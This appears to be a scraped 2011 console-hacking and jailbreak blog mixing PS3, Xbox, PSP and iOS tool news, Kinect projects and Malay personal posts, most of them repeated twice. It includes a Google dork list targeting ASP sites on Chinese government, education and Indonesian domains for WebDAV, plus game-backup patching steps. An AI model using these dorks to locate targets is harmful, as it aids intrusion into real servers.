the special file for bad data,set-UID programs owned by others ,and accessible
special files,and balk at unprivileged invokers.
Scott Walters London, CANADA
walterss@julian.uwo.ca
PGP 31 03 1B E1 C7 6E 3A EC 97 32 01 BA 5B 05 5D FB
finger me for public key block
MIME-mail welcome
'Beware the fury of a patient man.'
Monday, 26 December 2011
multiMAN 02.08.10 Update Released
What else is new? Deank's multiMAN 02.08.10! And she's all back to normal according to Dean, which the change log will explain:
multiMAN 02.08.10 UPDATE CHANGELOG
Backup from PS3 game discs now works as it should
You can still launch PSX games from XMMB Game Column
You can still launch PS3 game backups from DVD-R/RW / BD-R/RE
You cannot create ISO backups or access non-genuine PS3 game discs
You will see a “STAR” icon in XMMB Game column, which you can use to launch your PSX backups.
To keep the same functionality as before you can turn on “Direct Disc Access” from XMMB Settings column.
Press [TRIANGLE] -> Enable Direct Disc Access
When in Direct Disc Access mode you can do all the stuff you did before, except “creating backups of PS3 Game Discs”.
There you have it. Download the base package and the update right here ... not to mention the emulator pack, because ya gots to have that.
multiMAN 02.08.10 UPDATE
multiMAN 02.08.10 UPDATE CHANGELOG
Backup from PS3 game discs now works as it should
You can still launch PSX games from XMMB Game Column
You can still launch PS3 game backups from DVD-R/RW / BD-R/RE
You cannot create ISO backups or access non-genuine PS3 game discs
You will see a “STAR” icon in XMMB Game column, which you can use to launch your PSX backups.
To keep the same functionality as before you can turn on “Direct Disc Access” from XMMB Settings column.
Press [TRIANGLE] -> Enable Direct Disc Access
When in Direct Disc Access mode you can do all the stuff you did before, except “creating backups of PS3 Game Discs”.
There you have it. Download the base package and the update right here ... not to mention the emulator pack, because ya gots to have that.
multiMAN 02.08.10 UPDATE
Xbox Backup Creator v2.9.0.350 Released
of the new topology data introduced in the firmware. As noted in the release of LT+ v3.0, the topology data allows you to correctly answer the unique AP25 challenges introduced during the Metro dashboard beta.
Build 350 also features a few other changes such as the removal of the SplitVid and ISO tagging features, bugfixes for XGD1 titles and XGD3 drive response SS details. Other additions include tweaks here and there. In order to set Xbox Backup Creator to use the new topology data:
Click on the 'Image Tools' tab and select the 'Inject' radio button.
Load the image file that you want to patch.
Click on the 'AP25 Sector' button.
Select the necessary .bin file according to the game you're patching.
Save the image and burn using a Liteon iHas drive flashed with the iXtreme Burner MAX firmware.
Xbox Backup Creator 2.9.350
Build 350 also features a few other changes such as the removal of the SplitVid and ISO tagging features, bugfixes for XGD1 titles and XGD3 drive response SS details. Other additions include tweaks here and there. In order to set Xbox Backup Creator to use the new topology data:
Click on the 'Image Tools' tab and select the 'Inject' radio button.
Load the image file that you want to patch.
Click on the 'AP25 Sector' button.
Select the necessary .bin file according to the game you're patching.
Save the image and burn using a Liteon iHas drive flashed with the iXtreme Burner MAX firmware.
Xbox Backup Creator 2.9.350
sn0wbreeze v2.7.2
ih8sn0w's jailbreak/unlock tool for Windows
sn0wbreeze supports the following devices:
iPhone 3G[S]/4
iPod Touch 3G/4
iPad 1G
Apple TV 2
sn0wbreeze-v2.7.2.zip 22.55 MB
sn0wbreeze supports the following devices:
iPhone 3G[S]/4
iPod Touch 3G/4
iPad 1G
Apple TV 2
sn0wbreeze-v2.7.2.zip 22.55 MB
WebDav Dork - Google Dork Webdav
Webdav Dork
Webdav Google Dork
Ramai yang cari google dork untuk webdav.. jadi I buat la sat list utk u all.. have fun..
inurl:.co.id/*.asp
inurl:.ah.cn/*.asp
inurl:.bj.cn/*.asp
inurl:.cq.cn/*.asp
inurl:.fj.cn/*.asp
inurl:.gd.cn/*.asp
inurl:.gs.cn/*.asp
inurl:.gz.cn/*.asp
inurl:.gx.cn/*.asp
inurl:.ha.cn/*.asp
inurl:.hb.cn/*.asp
inurl:.he.cn/*.asp
inurl:.hi.cn/*.asp
inurl:.hl.cn/*.asp
inurl:.hn.cn/*.asp
inurl:.jl.cn/*.asp
inurl:.js.cn/*.asp
inurl:.jx.cn/*.asp
inurl:.ln.cn/*.asp
inurl:.nm.cn/*.asp
inurl:.nx.cn/*.asp
inurl:.qh.cn/*.asp
inurl:.sc.cn/*.asp
inurl:.sd.cn/*.asp
inurl:.sh.cn/*.asp
inurl:.sn.cn/*.asp
inurl:.sx.cn/*.asp
inurl:.tj.cn/*.asp
inurl:.tw.cn/*.asp
inurl:.xj.cn/*.asp
inurl:.xz.cn/*.asp
inurl:.yn.cn/*.asp
inurl:.zj.cn/*.asp
inurl:.ac.cn/*.asp
inurl:.com.cn/*.asp
inurl:.edu.cn/*.asp
inurl:.gov.cn/*.asp
inurl:.net.cn/*.asp
inurl:.org.cn/*.asp
creadit to 5y4kill3r
Webdav Google Dork
Ramai yang cari google dork untuk webdav.. jadi I buat la sat list utk u all.. have fun..
inurl:.co.id/*.asp
inurl:.ah.cn/*.asp
inurl:.bj.cn/*.asp
inurl:.cq.cn/*.asp
inurl:.fj.cn/*.asp
inurl:.gd.cn/*.asp
inurl:.gs.cn/*.asp
inurl:.gz.cn/*.asp
inurl:.gx.cn/*.asp
inurl:.ha.cn/*.asp
inurl:.hb.cn/*.asp
inurl:.he.cn/*.asp
inurl:.hi.cn/*.asp
inurl:.hl.cn/*.asp
inurl:.hn.cn/*.asp
inurl:.jl.cn/*.asp
inurl:.js.cn/*.asp
inurl:.jx.cn/*.asp
inurl:.ln.cn/*.asp
inurl:.nm.cn/*.asp
inurl:.nx.cn/*.asp
inurl:.qh.cn/*.asp
inurl:.sc.cn/*.asp
inurl:.sd.cn/*.asp
inurl:.sh.cn/*.asp
inurl:.sn.cn/*.asp
inurl:.sx.cn/*.asp
inurl:.tj.cn/*.asp
inurl:.tw.cn/*.asp
inurl:.xj.cn/*.asp
inurl:.xz.cn/*.asp
inurl:.yn.cn/*.asp
inurl:.zj.cn/*.asp
inurl:.ac.cn/*.asp
inurl:.com.cn/*.asp
inurl:.edu.cn/*.asp
inurl:.gov.cn/*.asp
inurl:.net.cn/*.asp
inurl:.org.cn/*.asp
creadit to 5y4kill3r
Get RemoteJoyLite Working On 6.60 PRO
For the PSP faithful that are still using custom firmware, 6.60 PRO to be exact and has been wondering about RemoteJoyLite support, let me tell you this... There isn't. However, no official release does not mean that other won't be working towards finding a workaround. HolmesInFive of 1337Mods has drafted up a quick tutorial to get the latest RemoteJoyLite plugin working on 6.60 PRO.
This tutorial was tested on 6.60 PRO B-9/B-10 but it should work on previous revisions. (And it was shortened where necessary)
First off, grab PSPDisp and RemoteJoyLite and extract them to a folder on your desktop. From there:
1. Install PSPDisp normally but do not select the option for Autostart. If you get a prompt about the drivers being unsafe/unsigned, just ignore it and continue with the installation.
2. After running PSDisp.exe, connect your PSP to USB Mode and navigate to the 'seplugins' folder on the root of your memory stick. There you need to open your VSH.txt, GAME.txt and GAME150.txt files (if you don’t have those text files then make them) and copy/paste this path into a new line in each file: ms0:/seplugins/RemoteJoyLite.prx 1
If you have a PSP Go, then your path will be ef0:/seplugins/RemoteJoyLite.prx 1
If you wish to use RemoteJoyLite with Popsloader (PSX), then copy these two paths to separate lines in the 'pops.txt' file: ms0:/seplugins/RemoteJoyLite.prx 1 ; flash0:/kd/usb.prx 1
3. Find the RemoteJoyLite folder and copy the RemoteJoyite.prx file to the 'seplugins' folder.
4. After this, disconnect your PSP and reboot. Once in the XMB, plug your USB in and run “RemoteJoyLite_en” found in the RemoteJoyLite folder. If setup correctly, RemoteJoyLite should be displaying your PSP's screen.
souce
This tutorial was tested on 6.60 PRO B-9/B-10 but it should work on previous revisions. (And it was shortened where necessary)
First off, grab PSPDisp and RemoteJoyLite and extract them to a folder on your desktop. From there:
1. Install PSPDisp normally but do not select the option for Autostart. If you get a prompt about the drivers being unsafe/unsigned, just ignore it and continue with the installation.
2. After running PSDisp.exe, connect your PSP to USB Mode and navigate to the 'seplugins' folder on the root of your memory stick. There you need to open your VSH.txt, GAME.txt and GAME150.txt files (if you don’t have those text files then make them) and copy/paste this path into a new line in each file: ms0:/seplugins/RemoteJoyLite.prx 1
If you have a PSP Go, then your path will be ef0:/seplugins/RemoteJoyLite.prx 1
If you wish to use RemoteJoyLite with Popsloader (PSX), then copy these two paths to separate lines in the 'pops.txt' file: ms0:/seplugins/RemoteJoyLite.prx 1 ; flash0:/kd/usb.prx 1
3. Find the RemoteJoyLite folder and copy the RemoteJoyite.prx file to the 'seplugins' folder.
4. After this, disconnect your PSP and reboot. Once in the XMB, plug your USB in and run “RemoteJoyLite_en” found in the RemoteJoyLite folder. If setup correctly, RemoteJoyLite should be displaying your PSP's screen.
souce
PS Vita Firmware xTractor v2.01 Released
SKFU has released PS Vita Firmware xTractor 2.01 ... and it's now compatible with Linux, as well introduces some other features: Download Vita firmware, a filename fix and other minor stuff. This app will take a Vita firmware file (PSP2UPDAT.PUP) and as the name suggests extract the contents -- it won't decrypt though ... not yet anyway. Nonetheless it's a step in the right direction.
I tried PS Vita Firmware xTractor out and sure enough it works. You can download the firmware 1.50 JP release and try yourself. The download function simply opens an XML file (on Sony's end) where you can copy/paste the direct link to the actual PUP. Only the JP version is out; US and EU you gotta wait for.
Download PS Vita Firmware xTractor for Windows and Linux below.
vita_win_201.rar 4.06 MB
lnx_vita_201.rar 4.5 MB
I tried PS Vita Firmware xTractor out and sure enough it works. You can download the firmware 1.50 JP release and try yourself. The download function simply opens an XML file (on Sony's end) where you can copy/paste the direct link to the actual PUP. Only the JP version is out; US and EU you gotta wait for.
Download PS Vita Firmware xTractor for Windows and Linux below.
vita_win_201.rar 4.06 MB
lnx_vita_201.rar 4.5 MB
Berbogel Promosi Sabun Mandi
Dengan hanya berbekalkan tuala yang berbalut di kepala tanpa seurat benang,pekerja sementara yang diupah oleh pegawai pemasaran syarikat sabun di China berbogel dan melayan penonton-penonton tanpa segan silu malahan mempelawa penonton yang rata-ratanya kaum lelaki untuk menyapukan sabun itu ke badan mereka..wah..beruntung sangat dah ni.Dah la free show,boleh usap-usap sabun lagi ye.Brutal jugak China ni eh.
put knife on ur face O_o
put knife on ur face O_o
SciVi 3D Scanning Tool Framework
A small group of researchers combined with a bunch of students from the Technical University of Bergakademie Frieberg have released their own 3D scanning tool taking advantage of the Kinects depth data called. They named the framework SciVi. The application uses AR markers to calibrate the "extrinsic parameters of the camera" and then align different views of the object being scanned.
The SciVi framework then processes the data in order to extract the point cloud data. The end result is a 3D mesh which is generated using Poisson surface reconstruction.
The full source code and download have been made available on their site if you're interested in trying it out. A disclaimer comes with the download in the sense that it was developed primarily as a school project and may content bugs and other "open ends"
For more visit the SciVi official project page
latest_scivi_framework.zip 12.78 MB
The SciVi framework then processes the data in order to extract the point cloud data. The end result is a 3D mesh which is generated using Poisson surface reconstruction.
The full source code and download have been made available on their site if you're interested in trying it out. A disclaimer comes with the download in the sense that it was developed primarily as a school project and may content bugs and other "open ends"
For more visit the SciVi official project page
latest_scivi_framework.zip 12.78 MB
Self Projector Using Kinect, Processing and a Transcreen
Here's a cool and interesting visual project that would be great for any type of live performance. Built in Processing, the Kinect captured image is projected onto a TransScreen. The end result is a digital shadow of sorts that can be overlaid onto people in real-time. The program can control the different visual display modes creating a wide array of possibilities. Check out the video to see this creative hack in action.
http://vimeo.com/17821576
http://vimeo.com/17821576
Evoluce Windows 7 SDK Released
The Evoluce SDK for Kinect and Windows 7 is now available and enables developers to create noncommercial applications with a natural user experience. The SDK uses depth sensing information like human motion tracking from devices like the Microsoft Kinect sensor and Asus Xtion Pro. Users will benefit from easy and intuitive applications in areas like events and exhibitions, education, digital signage and healthcare. The free Evoluce SDK for Kinect can be downloaded today at http://www.evoluce.com/_win-and-i/en/software/sdk-for-kinect/index.php
The Evoluce SDK includes high-quality technical documentation and several samples like the demo application “Motor Sport”. This sample shows how users can navigate through a menu and control images and videos by simple hand movements. Users can take control by waving the hand as long as they are within the range of the sensor that allows controller-free interaction up to a distance of 4.5 m. The demo application can be downloaded at http://www.evoluce.com/_win-and-i/en/software/overview/index.php?we_objectID=64
The Evoluce SDK enables our partners to explore an unlimited number of inspiring possibilities of depth-sensing devices in combination with intelligent software”, says Wolfgang Herfurtner, CEO of Evoluce. “Non-gaming applications can now be controlled by the wave of a hand! “
The Evoluce SDK for Kinect, which works with Windows 7, includes drivers and rich APIs for natural user interfaces, installer documents and resource materials and is powered by NITE and OpenNI. The Evoluce SDK provides capabilities to developers building applications with C++, C# using Microsoft® Visual Studio® 2010.
Evoluce will release a commercial version of the Evoluce SDK for Kinect at a later date.
Watch the video about the Evoluce SDK for Kinect incl. the demo application “Motor Sport” here:http://www.evoluce.com/_win-and-i/en/software/sdk-for-kinect/index.php?we_objectID=64
The Evoluce SDK includes high-quality technical documentation and several samples like the demo application “Motor Sport”. This sample shows how users can navigate through a menu and control images and videos by simple hand movements. Users can take control by waving the hand as long as they are within the range of the sensor that allows controller-free interaction up to a distance of 4.5 m. The demo application can be downloaded at http://www.evoluce.com/_win-and-i/en/software/overview/index.php?we_objectID=64
The Evoluce SDK enables our partners to explore an unlimited number of inspiring possibilities of depth-sensing devices in combination with intelligent software”, says Wolfgang Herfurtner, CEO of Evoluce. “Non-gaming applications can now be controlled by the wave of a hand! “
The Evoluce SDK for Kinect, which works with Windows 7, includes drivers and rich APIs for natural user interfaces, installer documents and resource materials and is powered by NITE and OpenNI. The Evoluce SDK provides capabilities to developers building applications with C++, C# using Microsoft® Visual Studio® 2010.
Evoluce will release a commercial version of the Evoluce SDK for Kinect at a later date.
Watch the video about the Evoluce SDK for Kinect incl. the demo application “Motor Sport” here:http://www.evoluce.com/_win-and-i/en/software/sdk-for-kinect/index.php?we_objectID=64
New Case Adds Unlocked SIM Slot to Jailbroken iPhones
Vooma has announced an iPhone case with a backup battery and an unlocked SIM slot, which adds to it's awesomeness The case works with a jailbreak only app that emulates the iPhone's native phone app to allow calls via the external SIM. Essentially, the case unlocks any jailbroken iPhone.
John Biggs, from TechCrunch tried a pre-release version of the case and was, apparently, very impressed.
Biggs states that once Peel PG92 is all set up, it works seamlessly. and even uses a similar interface to Apple’s own dialer. He notes that it's clear that the programmers had to cut a few corners to get the look and feel correct.
Biggs notes the dialing screen is actually a bitmapped copy of the original dialer and the letters and numbers are slightly warped. He goes on to say that all of the major functionality is recreated in the Vooma app.
It appears that the case fits mini-SIM cards, not the micro-SIM that fits in the iPhone 4 and 4S. Also, the external SIM could be used for voice calls only -- data most likely goes through the SIM card that's installed in the iPhone. Because the external SIM is used via its own app the internal SIM can still be used for voice calls even with the case installed.
Vooma has a sign-up form on its homepage to get more information on the Peel PG920, but the company has disclosed no details about pricing or availability.
John Biggs, from TechCrunch tried a pre-release version of the case and was, apparently, very impressed.
Biggs states that once Peel PG92 is all set up, it works seamlessly. and even uses a similar interface to Apple’s own dialer. He notes that it's clear that the programmers had to cut a few corners to get the look and feel correct.
Biggs notes the dialing screen is actually a bitmapped copy of the original dialer and the letters and numbers are slightly warped. He goes on to say that all of the major functionality is recreated in the Vooma app.
It appears that the case fits mini-SIM cards, not the micro-SIM that fits in the iPhone 4 and 4S. Also, the external SIM could be used for voice calls only -- data most likely goes through the SIM card that's installed in the iPhone. Because the external SIM is used via its own app the internal SIM can still be used for voice calls even with the case installed.
Vooma has a sign-up form on its homepage to get more information on the Peel PG920, but the company has disclosed no details about pricing or availability.
PwnageTool 4.3.2 Releases -- Supports iOS 4.3.2 untether
iPhone Dev Team have updated the
ir jailbreak tool, PwnageTool, to include the recent iOS 4.3.2 untether from @i0n1c.
Like Redsn0w, PwnageTool 4.3.2 supports all devices that actually support iOS 4.3.2, except iPad 2:
iPhone3GS
iPhone4 (GSM)
iPod touch 3G
iPod touch 4G
iPad1
From iPhone Dev Team blog:
PwnageTool 4.3.2 now includes the iOS 4.3.2 untether from @i0n1c. (And look, the PwnageTool and iOS version numbers actually match!).
Note that there’s a corresponding update to ultrasn0w, which has been bumped up to v1.2.2 to get along with iOS 4.3.2 (the ultrasn0w update does not include any new baseband support!). Please reboot your iPhone using the normal “slide to power off” swipe after installing ultrasn0w 1.2.2.
PwnageTool 4.3.2 is still Mac OS X only.
PwnageTool_4.3.2.dmg 28.54 MB
ir jailbreak tool, PwnageTool, to include the recent iOS 4.3.2 untether from @i0n1c.
Like Redsn0w, PwnageTool 4.3.2 supports all devices that actually support iOS 4.3.2, except iPad 2:
iPhone3GS
iPhone4 (GSM)
iPod touch 3G
iPod touch 4G
iPad1
From iPhone Dev Team blog:
PwnageTool 4.3.2 now includes the iOS 4.3.2 untether from @i0n1c. (And look, the PwnageTool and iOS version numbers actually match!).
Note that there’s a corresponding update to ultrasn0w, which has been bumped up to v1.2.2 to get along with iOS 4.3.2 (the ultrasn0w update does not include any new baseband support!). Please reboot your iPhone using the normal “slide to power off” swipe after installing ultrasn0w 1.2.2.
PwnageTool 4.3.2 is still Mac OS X only.
PwnageTool_4.3.2.dmg 28.54 MB
Update On iOS 5.0.1 Untethered Jailbreak [Not yet released]
You may already know that pod2g has developed a untethered jailbreak for iPhone 4, iPhone 3GS, iPod touch 3G, iPod touch 4G and Apple TV 2G running iOS 5.0.1. Pod2g has made additional progress on iPhone 4S and iPad 2 untethered jailbreak.
He has announced that he has handed over the details of the untethered jailbreak for iPhone 4, iPhone 3GS, iPod touch 3G, iPod touch 4G and Apple TV 2G to Chronic Dev team. Meanwhile, he will focus on getting an untethered jailbreak going for A5 processor devices such as the new iPhone 4S and iPad 2.
He writes that he's read the comments on the blog, and knows that a lot of people are waiting for the A5 jailbreak. He also realizes that there are tons of people out there with A4 or even earlier devices who wants the untether now and don't care about A5 support now. Could be interesting to way till A5 support is finished to release or even 5.1, so that we don't waste an exploit that took me months to find and develop.
He states he needs to focus on bring A5 support and hopes he can find a quick path.
He also explains that he has given all the details to the Chronic Dev Team so that they can finish, test, integrate and release the A4 jailbreak as soon as possible. He says that he will not put all his energy into A5 support!
Unfortunately, it might end up disappointing some people who were eagerly waiting to release the untethered jailbreak in the next few days, however, good news for iPhone 4S and iPad 2 users who currently can't jailbreak their iOS devices.
He has announced that he has handed over the details of the untethered jailbreak for iPhone 4, iPhone 3GS, iPod touch 3G, iPod touch 4G and Apple TV 2G to Chronic Dev team. Meanwhile, he will focus on getting an untethered jailbreak going for A5 processor devices such as the new iPhone 4S and iPad 2.
He writes that he's read the comments on the blog, and knows that a lot of people are waiting for the A5 jailbreak. He also realizes that there are tons of people out there with A4 or even earlier devices who wants the untether now and don't care about A5 support now. Could be interesting to way till A5 support is finished to release or even 5.1, so that we don't waste an exploit that took me months to find and develop.
He states he needs to focus on bring A5 support and hopes he can find a quick path.
He also explains that he has given all the details to the Chronic Dev Team so that they can finish, test, integrate and release the A4 jailbreak as soon as possible. He says that he will not put all his energy into A5 support!
Unfortunately, it might end up disappointing some people who were eagerly waiting to release the untethered jailbreak in the next few days, however, good news for iPhone 4S and iPad 2 users who currently can't jailbreak their iOS devices.
Saurik Is Coperating With Pod2G To Solve Cache Issue In Untethered Jailbreak For iPhone 4S
Today, Chronic Dev Team's member pod2g --the iOS hacker working on an untethered jailbreak for iOS 5.x-- updated his blog announcing thatt Jay Freeman (Also known as Saurik)-- hacker/developer of Cydia-- will be helping him (pod2g) solve cache issue in iPhone 4S untethered jailbreak.
pod2g writes that he figured out the A5 cache is not a problem anymore. He states that he sorted it out by doing the untether in a single thread and by flushing all the dcache then all the icache in a row at a strategical point of the process. He said took him over a hundred of tests to find the key. He then linked to ARM (source link) explaining issues related to self modifying code (or code patching) on the ARM platform.
He goes on to say that he spoke with Saurik about the launchd boot process, and said Saurik found one missing piece of the puzzle he (pod2g) needed to have a perfectly stable jailbreak.
Pod2g claims that joining with Saurik in coding, an untethered iOS 5.0.1 jailbreak should be expected in the very, very near future--as in a few days. However, still no date set in stone.
Twinaphex Emulators - Pack Compiled by pete_uk
PlayStation 3 developer pete_uk has released a compiled pack which contains the many emulators updated by Twinaphex. This pack includes Vice-Next and FBA-Next standalone and the following which are multiMAN compatible. FCEU-Next, VBA-Next, SNES9x-Next and Genesis-Next. Please note that these emulators originate from Twinaphex's github linked in the quote below.
A quote from pete_uk:
As some of you already know, I have recently been releasing compiled versions of Twinaphex's emulators. To make it easier for every one, I am today releasing new commits of all of Twinaphex's Emulators in one pack. Please READ the notes to FBA-Next and VBA-Next.
Included are:
Multiman Compatible:
FCEU-Next: Famicom/NES Emulator
Commit: 06cbc88957ebd089dcde4cf41c97ef5040bb669b (15/12/2011)
VBA-Next: Game Boy, Gameboy Color, Super Game Boy & Gamboy Advance Emulator
Commit: 8ff8246f73e66271a46574681ae80781dfbae5e5 (15/12/2011)
Notes: There is currently an issue with loading ZIPPED Roms, Please UNZIP your Roms first!!
SNES9x-Next: Super Nintendo / Super Famicom Emulator
Commit: 04f58848306c558991930d6c9db1b1c6a10e0414 (22/12/2011)
Genesis-Next: Genesis / Megadrive, Master System, Game Gear Emulator
Commit: 5ff4baeef68f70bc0059173fbc8b4147f160ef74 (15/12/2011)
Not Multiman Compatible:
Vice-Next: Commodore 64 Emulator
Commit: 6c47adcf45b804bfa34a512af8ec2dca63efe2da (09/12/2011)
FBA-Next: Multi Arcade Machine Emulator
Commit: 42621334054fb4faaf90ba37da2f8a836cca5c95 (18/10/2011)
Notes: This is not the newest commit available. This version is more stable and all options work as desired. If you experience a black screen crash on opening, Use Multiman or FTP to transfer your roms to "/dev_hdd0/game/FBAN00000/USRDIR/roms"
Thanks to Twinaphex (https://github.com/twinaphex) for all of your work on these emulators and your continuing improvements to them.
Download: NEXT Emulator Pack
A quote from pete_uk:
As some of you already know, I have recently been releasing compiled versions of Twinaphex's emulators. To make it easier for every one, I am today releasing new commits of all of Twinaphex's Emulators in one pack. Please READ the notes to FBA-Next and VBA-Next.
Included are:
Multiman Compatible:
FCEU-Next: Famicom/NES Emulator
Commit: 06cbc88957ebd089dcde4cf41c97ef5040bb669b (15/12/2011)
VBA-Next: Game Boy, Gameboy Color, Super Game Boy & Gamboy Advance Emulator
Commit: 8ff8246f73e66271a46574681ae80781dfbae5e5 (15/12/2011)
Notes: There is currently an issue with loading ZIPPED Roms, Please UNZIP your Roms first!!
SNES9x-Next: Super Nintendo / Super Famicom Emulator
Commit: 04f58848306c558991930d6c9db1b1c6a10e0414 (22/12/2011)
Genesis-Next: Genesis / Megadrive, Master System, Game Gear Emulator
Commit: 5ff4baeef68f70bc0059173fbc8b4147f160ef74 (15/12/2011)
Not Multiman Compatible:
Vice-Next: Commodore 64 Emulator
Commit: 6c47adcf45b804bfa34a512af8ec2dca63efe2da (09/12/2011)
FBA-Next: Multi Arcade Machine Emulator
Commit: 42621334054fb4faaf90ba37da2f8a836cca5c95 (18/10/2011)
Notes: This is not the newest commit available. This version is more stable and all options work as desired. If you experience a black screen crash on opening, Use Multiman or FTP to transfer your roms to "/dev_hdd0/game/FBAN00000/USRDIR/roms"
Thanks to Twinaphex (https://github.com/twinaphex) for all of your work on these emulators and your continuing improvements to them.
Download: NEXT Emulator Pack
Game Save Now Working for PS3 Game Sonic Generations
A PlayStation 3 developer, chnps3hax, has released a fix that many where anticipating. Sonic Generations was released a while back but unfortunately game saves did not work. chnps3hax has released a fix for those of you tired of restarting the game.
How to install:
Download Sonic_Generation_EU_fix.rar
Extract files.
Use multiMAN to mount game and play.
Download: Sonic_Generation_EU_fix.rar
How to install:
Download Sonic_Generation_EU_fix.rar
Extract files.
Use multiMAN to mount game and play.
Download: Sonic_Generation_EU_fix.rar
Wololo Confirms Teck4's PS Vita PSP Exploit
News of an exploit running on the PS Vita has been circulating the web recently. The exploit allows HBL (Half-Byte Loader) to partially run on the PS Vita through it's PSP emulator. Wololo has confirmed Teck4's exploit and shows us a video of it running on the PSP 1000 and PS Vita.
Last week, an exploit on the PS Vita through the PSP emulator was announced by Mamosuke. The exploit was found by Teck4, and, we won’t stress it enough, is a PSP exploit that gives us user mode access within the PSP emulator on the Vita. So this is not a Vita exploit per se, but it’s still very cool. Mamosuke confirmed this with a video a few days ago, and today I was able to confirm the exploit myself as shown in the video below (and I must admit that I spent way too much time working on that basic flame effect). The video below shows the exploit running on both a PSP 1000 and the PS Vita.
I spent a good amount of time today confirming some of my hopes that it will be possible to run HBL, at least to some extent, with that exploit. It doesn’t mean I have ported HBL to the Vita yet, but I have strong hopes this will be possible. A handful of hackers are working on bringing HBL to the Vita (I won’t mention their names here as I don’t know if they want to be contacted on the subject), and it should be “relatively” easy to get something to work fairly soon. (It should be noted though that the Vita is quite sensitive and crashed on me several times when it went into “sleep” mode from the exploit screen… from there – am I just paranoid? – it seems it is impossible to reboot the machine for almost 10 minutes, which made me think I had bricked my vita… could it be a anti-hacking security? If the console detects several crashes, it takes longer to boot, in order to prevent brusteforce types of attacks?)
I won’t discuss any release yet, it doesn’t depend on me only (this is, after all, Teck4′s exploit), but if I have my opinion to give on the subject, I would suggest to wait until the Vita is released in Europe and in the US. This gives us some time to polish HBL on this device, and hopefully the vulnerabilities we use to run HBL won’t have been patched by then.
This is of course just a challenge with little to no practical interest… once we publicly reveal the exploit (in particular, the game used in it), it will be extremely easy for Sony to patch it (or remove the game from the Playstation Store), so probably only a few people will be able to benefit from it… but only time will tell, there is still hope, after all, that Sony doesn’t care about a tool that allows us to run user mode psp homebrews in a sandboxed emulator.
Here’s also a screenshot since there is not autofocus on camera
Last week, an exploit on the PS Vita through the PSP emulator was announced by Mamosuke. The exploit was found by Teck4, and, we won’t stress it enough, is a PSP exploit that gives us user mode access within the PSP emulator on the Vita. So this is not a Vita exploit per se, but it’s still very cool. Mamosuke confirmed this with a video a few days ago, and today I was able to confirm the exploit myself as shown in the video below (and I must admit that I spent way too much time working on that basic flame effect). The video below shows the exploit running on both a PSP 1000 and the PS Vita.
I spent a good amount of time today confirming some of my hopes that it will be possible to run HBL, at least to some extent, with that exploit. It doesn’t mean I have ported HBL to the Vita yet, but I have strong hopes this will be possible. A handful of hackers are working on bringing HBL to the Vita (I won’t mention their names here as I don’t know if they want to be contacted on the subject), and it should be “relatively” easy to get something to work fairly soon. (It should be noted though that the Vita is quite sensitive and crashed on me several times when it went into “sleep” mode from the exploit screen… from there – am I just paranoid? – it seems it is impossible to reboot the machine for almost 10 minutes, which made me think I had bricked my vita… could it be a anti-hacking security? If the console detects several crashes, it takes longer to boot, in order to prevent brusteforce types of attacks?)
I won’t discuss any release yet, it doesn’t depend on me only (this is, after all, Teck4′s exploit), but if I have my opinion to give on the subject, I would suggest to wait until the Vita is released in Europe and in the US. This gives us some time to polish HBL on this device, and hopefully the vulnerabilities we use to run HBL won’t have been patched by then.
This is of course just a challenge with little to no practical interest… once we publicly reveal the exploit (in particular, the game used in it), it will be extremely easy for Sony to patch it (or remove the game from the Playstation Store), so probably only a few people will be able to benefit from it… but only time will tell, there is still hope, after all, that Sony doesn’t care about a tool that allows us to run user mode psp homebrews in a sandboxed emulator.
Here’s also a screenshot since there is not autofocus on camera
Sakit itu nikmat
Sakit itu nikmat. Sebab apa? Sekurang-kurangnya kita boleh mengetahui sejauh manakah sistem pertahanan kita mampu melawan penyakit. Sakit macam demam, batuk, selesema itu dikira sebagai sakit yang biasalah. Rata-rata manusia mesti pernah kena demam sekurang-kurangnya sekali dalam hidup mereka.
Aku jarang sakit. Bukanlah sebab aku mengamalkan gaya hidup yang sihat pun. Aku jarang bersenam. Tapi tak tahulah kalau mengejar bas, mengejar keretapi waktu nak ke pejabat tu dikira sebagai aktiviti senaman. Adegan kejar-mengejar kenderaan awam ialah adegan yang biasa aku buat setiap hari Isnin hingga Jumaat, pada waktu puncak.
Baru-baru ini aku diserang demam yang agak kuat. Suhu badan meningkat, seram sejuk, lagi-lagi kalau sebelah malam. Rasa macam kena denggi pun ada. Aktiviti demam teruk ni sebenarnya aktiviti tahunan bagi aku, sebab setiap tahun pun memang macam ni. Dulu aku pun pelik, kenapa jarang-jarang sakit? Tapi bila sakit, memang kena kaw-kaw punya, macam kopi o kaw.
Tapi sakit ni bagus sebenarnya. Bagi orang yang jarang sakit macam aku ni, aku boleh tahu sejauh manakah keupayaan sistem pertahanan badan aku untuk kembali pulih. Pada waktu artikel (artikel la sangat) ini sedang ditaip, aku masih lagi dalam proses menyembuhkan diri. Dah dekat seminggu jugalah demam ni.
Lagi satu, masa ni la Allah nak uji kesabaran kita. Baru sakit sikit je bro, takkan la tak boleh tahan kan? Jadi baguslah sebenarnya sakit ni. Nak cerita pun malaslah, boleh gunakan enjin carian seperti Google, Yahoo, Bing dan sebagainya untuk mencari hadis tentang hikmah sakit ni.
Kesimpulan yang dapat aku buat, kalau sakit tu, tak perlulah nak mengeluh. Bersyukurlah sebab Tuhan nak uji kita. Insan-insan terpilih je yang diberi ujian ni. Kalau para nabi dan rasul, ujian diorang lagilah dahsyat. Alhamdulillah.
Oh ye, jangan lupa habiskan antibiotik anda.
Aku jarang sakit. Bukanlah sebab aku mengamalkan gaya hidup yang sihat pun. Aku jarang bersenam. Tapi tak tahulah kalau mengejar bas, mengejar keretapi waktu nak ke pejabat tu dikira sebagai aktiviti senaman. Adegan kejar-mengejar kenderaan awam ialah adegan yang biasa aku buat setiap hari Isnin hingga Jumaat, pada waktu puncak.
Baru-baru ini aku diserang demam yang agak kuat. Suhu badan meningkat, seram sejuk, lagi-lagi kalau sebelah malam. Rasa macam kena denggi pun ada. Aktiviti demam teruk ni sebenarnya aktiviti tahunan bagi aku, sebab setiap tahun pun memang macam ni. Dulu aku pun pelik, kenapa jarang-jarang sakit? Tapi bila sakit, memang kena kaw-kaw punya, macam kopi o kaw.
Tapi sakit ni bagus sebenarnya. Bagi orang yang jarang sakit macam aku ni, aku boleh tahu sejauh manakah keupayaan sistem pertahanan badan aku untuk kembali pulih. Pada waktu artikel (artikel la sangat) ini sedang ditaip, aku masih lagi dalam proses menyembuhkan diri. Dah dekat seminggu jugalah demam ni.
